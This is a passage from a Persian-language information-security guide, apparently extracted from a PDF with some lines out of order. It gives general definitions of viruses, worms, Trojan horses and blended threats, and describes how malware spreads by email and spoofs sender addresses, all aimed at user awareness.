‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺑﺮﻧﺎﻣـﺔ ﻣﻴﺰﺑـﺎﻥ ﻧﻴـﺎﺯ ﻧﺪﺍﺭﻧـﺪ‪.‬‬
‫ﻫﻤﺎﻧﻨﺪ ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻳﻚ ﻛﺮﻡ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻨﻬـﺎ‬
‫ﻧﺴﺨﻪﻫـﺎﻳﻲ ﺍﺯ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﺟﺎﻫـﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﺗﻜﺮﺍﺭ ﻛﻨﺪ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﻋﻤﻠﻴـﺎﺕ‬
‫ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ .‬ﻛﺮﻡ ﺗﻨﻬﺎ ﺯﻣـﺎﻧﻲ ﻛـﺎﺭ‬
‫ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻠﻴـﺖ ﭘـﺬﻳﺮﻓﺘﻦ ﻣﻨـﺎﺑﻊ‬
‫ﺧﺎﺭﺟﻲ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺁﻥ ﻣﻨـﺎﺑﻊ‬
‫ﺑﺘﻮﺍﻧﺪ ﺑـﻪ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪ ﺑﭙـﺮﺩﺍﺯﺩ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﺑـﺪﺍﻓﺰﺍﺭﻫﺎ‪،‬‬
‫ﻛﺮﻡ ﺭﺍ ﻧﻴﺰ ﻧﻮﻋﻲ ﻭﻳﺮﻭﺱ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﺍﺳﺐ ﺗﺮﺍﻭﺍ‬
‫ﻧﺎﻡ ﺍﻳﻦ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺯ ﺍﻓـﺴﺎﻧﺔ ﺟﻨـﮓ ﺷـﻬﺮ‬
‫ﺗﺮﺍﻭﺍ ﺩﺭ ﻳﻮﻧـﺎﻥ ﺑﺮﮔﺮﻓﺘـﻪ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺁﻥ‬
‫ﺍﻓﺴﺎﻧﻪ‪ ،‬ﻳﻮﻧﺎﻧﻲﻫﺎ ﻳﻚ ﺍﺳﺐ ﭼﻮﺑﻲ ﺑﺰﺭﮒ ﺭﺍ ﺍﺯ‬
‫ﺩﺭﻭﺍﺯﺓ ﺷﻬﺮ ﺑﻪ ﺩﺍﺧﻞ ﻣﻲﻓﺮﺳﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ‬
‫ﺍﺳﺐ ﻭﺍﺭﺩ ﺷﻬﺮ ﻣﻲﺷﻮﺩ ﺗﻌﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺳـﺮﺑﺎﺯ‬
‫ﻳﻮﻧﺎﻧﻲ ﺍﺯ ﺁﻥ ﺧﺎﺭﺝ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﺷـﻬﺮ ﺭﺍ ﺑـﻪ‬
‫ﺗﺼﺮﻑ ﺧﻮﺩ ﺩﺭ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺍﺯ ﺁﻥ ﺯﻣﺎﻥ ﺑﻪ ﺑﻌـﺪ‬
‫"ﺍﺳﺐ ﺗـﺮﺍﻭﺍ" ﺑـﻪ ﻣﻌﻨـﺎﻱ ﭼﻴـﺰﻱ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻇﺎﻫﺮﻱ ﻋﺎﺩﻱ ﺍﻣﺎ ﻣﺤﺘﻮﻳﺎﺗﻲ ﺧﻄﺮﻧﺎﻙ ﺩﺍﺭﺩ‪.‬‬
‫ﺩﺭ ﻣﻔﺎﻫﻴﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ ،‬ﺍﺳـﺐ ﺗـﺮﺍﻭﺍ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺧﺮﺍﺑﻴﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ ﻭ ﻳﺎ ﺍﻋﻤﺎﻟﻲ ﻏﻴﺮ‬
‫ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ ﺩﺍﺭﺩ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ‪.‬‬
‫ﺍﻳﻦ ﺍﺻﻄﻼﺡ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ‬
‫ﻻ ﺑـﺪﻭﻥ‬
‫ﻣﺨﺮﺑﻲ ﺍﻃﻼﻕ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﻃﻼﻉ ﻭ ﺍﺟﺎﺯﺓ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣﻲﺷـﻮﻧﺪ ﻭ‬
‫ﺑﻪ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ‪.‬‬
‫ﻣﻘﺪﻣﻪ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ‬
‫‪٣٦‬‬
‫ﻋﻼﻣﺖ ﺍﺧﺘﺼﺎﺭﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺑـﺪﺍﻓﺰﺍﺭ‪ ٣٧‬ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬
‫ﻻ ﺑﺮﺍﻱ ﺁﺳﻴﺐ ﺭﺳﺎﻧﺪﻥ ﻳﺎ ﺧﺮﺍﺏ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻢ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻃﺮﺍﺣﻲ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺍﻭﻟﻴﻦ ﻭﻳﺮﻭﺱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۸۱‬ﺷﻨﺎﺳﺎﻳﻲ ﺷـﺪ‪ .‬ﻣﻔﻬـﻮﻡ‬
‫ﻛــﺮﻡ ﺭﺍﻳﺎﻧــﻪﺍﻱ‪ ٣٨‬ﺩﺭ ﻛﺘــﺎﺏ "‪ "Science Fiction‬ﺩﺭ ﺳــﺎﻝ‬
‫‪ ۱۹۷۵‬ﻣﻌﺮﻓﻲ ﺷﺪ ﻭ ﺍﻭﻟﻴﻦ ﻓﻌﺎﻟﻴﺖ ﻭﺍﻗﻌﻲ ﺁﻥ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺍﻭﺍﻳـﻞ‬
‫ﺩﻫﺔ ‪ ۱۹۸۰‬ﺍﺳﺖ‪ .‬ﺟﺎﻟﺐ ﺍﺳﺖ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﻳﻦ ﻛﺮﻣﻬﺎ ﺍﻭﻟـﻴﻦ ﺑـﺎﺭ‬
‫ﺑﺮﺍﻱ ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﺷـﺪﻧﺪ ﻛـﻪ ﻋﻤﻠﻜـﺮﺩ ﻣﺜﺒـﺖ ﻭ ﻣﻔﻴـﺪ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﭘﻴـﺪﺍﻳﺶ ﺍﺳـﺒﻬﺎﻱ ﺗـﺮﺍﻭﺍﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ ٣٩‬ﻫـﻢ ﺑـﻪ ﺍﻭﻟـﻴﻦ‬
‫ﺭﻭﺯﻫﺎﻱ ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ )ﺩﻫﺔ ‪ (۱۹۶۰‬ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺗﺎﺭﻳﺦ‬
‫ﻭ ﺳﺎﺑﻘﺔ ﻃﻮﻻﻧﻲ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ‪ ،‬ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺗﺄﺛﻴﺮﺍﺕ ﻣﺨﺮﺏ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ﺷـﺪﻳﺪ ﻭ ﺧﻄﺮﻧـﺎﻙ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﺁﻏﺎﺯ ﺑﺎﻳﺪ ﻣﻌﻨﺎ ﻭ ﻣﻔﻬﻮﻡ ﺍﻳﻦ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍ ﺗﻌﺮﻳﻒ ﻛﻨﻴﻢ‪.‬‬
‫ﻭﻳﺮﻭﺱ‬
‫ﻭﻳﺮﻭﺱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺩﻳﮕﺮ ﻣﺘﺼﻞ ﻣـﻲﺷـﻮﺩ ﻭ ﻳـﺎ ﻭﺍﺭﺩ ﺑﺪﻧـﺔ ﻳـﻚ‬
‫ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮ ﻣﻲﮔـﺮﺩﺩ‪ .‬ﻭﻗﺘـﻲ ﺁﻥ ﺑﺮﻧﺎﻣـﻪ ﺑـﻪ‬
‫‪Malicious Software‬‬
‫‪Malware‬‬
‫‪Computer Worms‬‬
‫‪Computer Trojan Horses‬‬
‫‪36‬‬
‫‪37‬‬
‫‪38‬‬
‫‪39‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﺪ‪ ،‬ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣـﻲ ﺷـﻮﺩ ﻭ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻓﺎﻳﻠﻬﺎ ﻳـﺎ ﺩﻳـﺴﻜﻬﺎﻱ‬
‫ﺩﻳﮕﺮ ﻣﻲ ﻛﻨـﺪ ﻭ ﺑﺪﻳﻨـﺼﻮﺭﺕ ﺧـﻮﺩ ﺭﺍ ﺗﻜـﺮﺍﺭ‬
‫ﻣﻲ ﻧﻤﺎﻳﺪ‪ ،‬ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻫﺮﻳـﻚ ﺍﺯ ﻓﺎﻳﻬـﺎ ﻳـﺎ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﺍﻳﻦ ﺭﻭﻧـﺪ ﺑـﺎﺭ‬
‫ﺩﻳﮕﺮ ﺗﻜﺮﺍﺭ ﻣﻲ ﮔﺮﺩﺩ‪ .‬ﻭﻳﺮﻭﺱ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﻛﺎﺭﻫـﺎﻱ ﺩﻳﮕـﺮﻱ ﻧﻴـﺰ‬
‫ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪.‬‬
‫‪٧٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺭﺳﺎﻝ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫"‪"Bonus‬‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭ ‪ bonus‬ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺑـﺪﻭﻥ‬
‫ﺁﮔﺎﻫﻲ ﺷﻤﺎ ﺣﺎﻭﻱ ﺑﺴﺘﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‬
‫ﺩﺭ ﺁﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻗـﺮﺍﺭ ﮔـﺮﻓﺘﻦ ﺑـﺴﺘﻪﻫــﺎﻱ‬
‫ﺩﻳﮕﺮ ﺩﺭ ﻳﻚ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﻣﺮﺳﻮﻡ ﺍﺳـﺖ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﻧﺼﺐ ﻛﻨﻴﺪ‬
‫ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺷــﺎﻣﻞ ﺑﺮﻧﺎﻣــﺔﻫــﺎﻳﻲ ﭼــﻮﻥ‬
‫‪ Adobe Acrobat‬ﻳـــﺎ ﻧـــﺮﻡﺍﻓﺰﺍﺭﻫـــﺎﻱ‬
‫ﭼﻨﺪﺭﺳﺎﻧﻪﺍﻱ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺍﻣﺮ ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﺍﺳﺖ‬
‫ﻻ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻛﺎﺭﺍﻳﻲ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﺻـﻠﻲ‬
‫ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ‬
‫ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ ﻭ ﺭﻭﻧﺪ ﻓﻌﺎﻟﻴـﺖ ﻧﻴـﺰ ﻣﻌﻤـﻮ ﹰ‬
‫ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﺳﺖ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﻤﺎﻳـﻞ ﺷـﻤﺎ‬
‫ﺁﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺟﺎﻧﺒﻲ ﺭﺍ ﻧﺼﺐ ﻣـﻲﻛﻨـﺪ ﻳـﺎ‬
‫ﺍﻳﻨﻜﻪ ﺩﺭ ﺁﻏﺎﺯ ﻧﺼﺐ ﺁﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺷـﻤﺎ ﺭﺍ ﺍﺯ‬
‫ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﺁﮔــﺎﻩ ﻣــﻲﺳــﺎﺯﺩ‪ .‬ﻋﻤﻠﻜــﺮﺩ‬
‫ﻻ ﻣﺘﻔــﺎﻭﺕ ﺍﺯ‬
‫ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ‪ bonus‬ﻣﻌﻤــﻮ ﹰ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺻﻠﻲ ﺍﺳـﺖ ﻭ ﺍﮔـﺮ ﭼـﺎﺭﻩﺍﻱ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻴﺪ ﻣﺴﻠﻤﹰﺎ ﻧﺒﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺗﺮﺍﻭﺍ‪ ،‬ﻭﻳﺮﻭﺱ ﻭ ﻛﺮﻡ ﺑﺮﺍﻱ ﻳﻚ ﺑﺮﻧﺎﻣـﻪ "ﺍﻧﺤـﺼﺎﺭﻱ"‬
‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺪﺍﻓﺰﺍﺭﻱ ﺑﺎ ﺑـﻴﺶ‬
‫ﺍﺯ ﻳﻚ ﻭﻳﮋﮔﻲ ﺑﻨﻮﻳﺴﻨﺪ؛ ﻣﺎﻧﻨﺪ ﺗـﺮﺍﻭﺍﻱ ﺧـﻮﺩ ﺗﻜـﺮﺍﺭ ﺷـﻮﻧﺪﻩ‪.٤٠‬‬
‫ﺑﺪﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳـﻚ ﺧـﺼﻮﺻﻴﺖ ﻣﺨـﺮﺏ ﺍﺳـﺖ‬
‫ﺗﻬﺪﻳﺪ ﭼﻨﺪﻭﺟﻬﻲ‪ ٤١‬ﻧﺎﻣﻴﺪﻩ ﻣـﻲ ﺷـﻮﺩ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﻣـﺸﺎﻫﺪﻩ‬
‫ﻣــﻲﻛﻨﻴــﺪ ﺍﻳــﻦ ﻋﻨــﺎﻭﻳﻦ ﻋﻤﻮﻣــﹰﺎ ﺍﺯ ﺭﻭﻱ ﻧﺤــﻮﺓ ﮔــﺴﺘﺮﺵ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺗﻌﺮﻳﻒ ﺷﺪﻩﺍﻧﺪ ﻭ ﻧـﻪ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻧﺤـﻮﺓ‬
‫ﻋﻤﻠﻜﺮﺩ ﺁﻧﻬﺎ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ‬
‫ﺭﺍﻫﻬﺎﻱ ﺍﻧﺘﺸﺎﺭ ﺁﻧﻬﺎ ﺑﺮﺭﺳـﻲ ﻣـﻲﺷـﻮﺩ‪ .‬ﺩﺭ ﻓـﺼﻠﻬﺎﻱ ﺑﻌـﺪ ﻧﻴـﺰ‬
‫ﺭﻭﺷﻬﺎﻱ ﺍﻳﻤﻦ ﺳـﺎﺧﺘﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺍﻳـﻦ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﻋﻤﻠﻜﺮﺩ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ‬
‫ﻫﻴﭻ ﻣﺤﺪﻭﺩﻳﺘﻲ ﺩﺭ ﭼﮕﻮﻧﮕﻲ ﻓﻌﺎﻟﻴـﺖ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ‬
‫ﻻ ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺩﺭ‬
‫ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻭﺟﻮﺩ ﻧـﺪﺍﺭﺩ‪ ،‬ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﻭﺍﺟﺪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﻣﺸﺘﺮﻛﻲ ﻫﺴﺘﻨﺪ‪:‬‬
‫‪Self-Replicating Trojan‬‬
‫‪Blended Threat‬‬
‫‪40‬‬
‫‪41‬‬
‫ﺍﺭﺳــﺎﻝ ﻧﺎﻣــﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻳﻜــﻲ ﺍﺯ ﺭﺍﻳﺠﺘــﺮﻳﻦ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ‬
‫ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻣﺨـﺮﺏ ﺍﺳـﺖ‪ .‬ﻧﺎﻣـﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺿﻤﻴﻤﻪ ﺍﻱ‪ ٤٢‬ﺷﺎﻣﻞ ﻭﻳﺮﻭﺱ ﻳﺎ ﻛﺮﻡ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻣﺘﻦ‪ ٤٣‬ﺁﻥ ﻧﻴﺰ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻃﻼﻋﺎﺕ ﺧﺎﺻـﻲ ﺗﻨﻈـﻴﻢ ﺷـﺪﻩ ﺑﺎﺷـﺪ )ﻧﻈﻴـﺮ‬
‫ﻫﺸﺪﺍﺭﻫﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ( ﻳﺎ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﺩﺍﺭﺍﻱ ﻳﻚ ﻗﺴﻤﺖ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﻧﺎﻣﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﭘﻴـﺸﻴﻦ‬
‫ﺷﻤﺎ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺿـﻤﻴﻤﺔ ﻧﺎﻣـﻪ ﻓﺎﻳـﻞ‬
‫ﻻ ﻣﺘﻦ ﺁﻥ ﺑﻪ ﻧﺤـﻮﻱ ﺩﺭﻳﺎﻓـﺖ ﻛﻨﻨـﺪﻩ ﺭﺍ‬
‫ﺧﻄﺮﻧﺎﻛﻲ ﺑﺎﺷﺪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫‪٤٤‬‬
‫ﺗﺸﻮﻳﻖ ﻣﻲﻧﻤﺎﻳﺪ ﻛﻪ ﺿﻤﻴﻤﻪ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ‪ .‬ﻓﻴﻠﺪﻫﺎﻱ ﻣﻮﺿـﻮﻉ ﻭ‬
‫ﻻ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻣﻲﺷـﻮﻧﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﺭﺍ‬
‫ﻓﺮﺳﺘﻨﺪﻩ‪ ٤٥‬ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ‬
‫ﺗﺸﻮﻳﻖ ﻛﻨﻨﺪ ﻛﻪ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ )ﻣﺜﻞ ﻛﺮﻡ ﻣﺸﻬﻮﺭﻱ ﻛـﻪ‬
‫ﻻ ﺑـﺮﺍﻱ‬
‫ﻣﻮﺿﻮﻉ ﺁﻥ "‪ "I Love You‬ﺑﻮﺩ(‪ .‬ﺍﻳـﻦ ﻧـﻮﻉ ﭘﻴﺎﻣﻬـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﻓﺮﺍﺩﻱ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺁﺩﺭﺱ ﺁﻧﻬﺎ ﺩﺭ ﻓﻬﺮﺳﺖ ﺁﺩﺭﺳـﻬﺎ ﻳـﺎ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍﻳﺎﻧﺔ ﺁﻟـﻮﺩﻩ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﻭﻗﺘـﻲ‬
‫ﭘﻴﺎﻣﻬﺎ ﺑﺮﺍﻱ ﻫﻤﺔ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺍﺭﺳﺎﻝ ﺷﺪ ﺑﺮﻧﺎﻣﻪ ﻣﺘﻮﻗﻒ ﻣﻲﮔـﺮﺩﺩ‪،‬‬
‫ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑﺎﺯ ﻫﻢ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ ‪ -‬ﭼـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﺔ ﺍﻭﻟﻴـﻪ ﻭ‬
‫ﭼﻪ ﺍﺯ ﻣﺒﺎﺩﻱ ﺟﺪﻳﺪ ‪ -‬ﺍﺯ ﺳﺮ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ‬
‫ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﺑﺎ ﻭﻳﺮﻭﺱ ﻳﺎ ﻛﺮﻡ ﺁﻟﻮﺩﻩ ﺷﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺁﻥ‬
‫ﻭﻳﺮﻭﺱ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻓﻴﻠـﺪ "ﻓﺮﺳـﺘﻨﺪﻩ" ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺁﻟﻮﺩﻩ ﮔﺬﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﺷﺎﻳﺪ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴـﻞ ﻛـﻪ ﺁﺩﺭﺱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﻣﺎﺷـﻴﻦ‬
‫ﺁﻟﻮﺩﻩ ﻳﺎﻓﺘﻪ ﺍﺳﺖ( ﺍﻳﻦ ﺷـﻤﺎ ﻫـﺴﺘﻴﺪ ﻛـﻪ ﻣـﺘﻬﻢ ﺑـﻪ ﺗﻮﺯﻳـﻊ ﺍﻳـﻦ‬
‫ﻭﻳﺮﻭﺱ ﺧﻮﺍﻫﻴﺪ ﺷﺪ! )ﺍﻳﻦ ﻓﻦ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﮔﻲ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ٤٦‬ﻧـﺎﻡ‬
‫ﺩﺍﺭﺩ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﺳﺘﻔﺎﺩﺓ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺍﺯ ﺁﻥ‪ ،‬ﺑﺴﺎﺩﮔﻲ ﻧﻤﻲﺗﻮﺍﻥ ﻣـﺸﺨﺺ‬
‫ﻛﺮﺩ ﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺁﻟﻮﺩﺓ ﻭﺍﻗﻌﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﭼﻪ ﻛﺴﻲ ﺍﺳﺖ(‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﻣﻲ ﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﻭ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻭ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ‬
